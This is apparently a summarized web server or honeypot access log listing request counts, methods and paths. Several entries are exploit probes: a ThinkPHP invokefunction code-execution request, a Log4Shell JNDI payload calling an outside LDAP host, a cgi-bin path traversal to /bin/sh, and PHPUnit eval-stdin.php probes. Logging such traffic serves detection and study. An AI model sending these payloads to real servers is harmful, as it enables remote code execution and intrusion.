| 1 | GET | /ab2h | HTTP/1.1 |
| 1 | GET | /api/openapi/common/getDownloadUrl?lang=yn_YN | HTTP/1.1 |
| 4 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 2 | GET | /console/ | HTTP/1.1 |
| 2 | GET | /dispatch.asp | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /java_script/template_1/common.js | HTTP/1.1 |
| 1 | GET | /kINlo0YqM8ADiTpr5abdHFwWeyF | HTTP/1.1 |
| 1 | GET | /login | HTTP/1.1 |
| 1 | GET | /odd/app/download/list | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | /${jndi:ldap://45[.]83[.]193[.]150:1389/Exploit} | HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
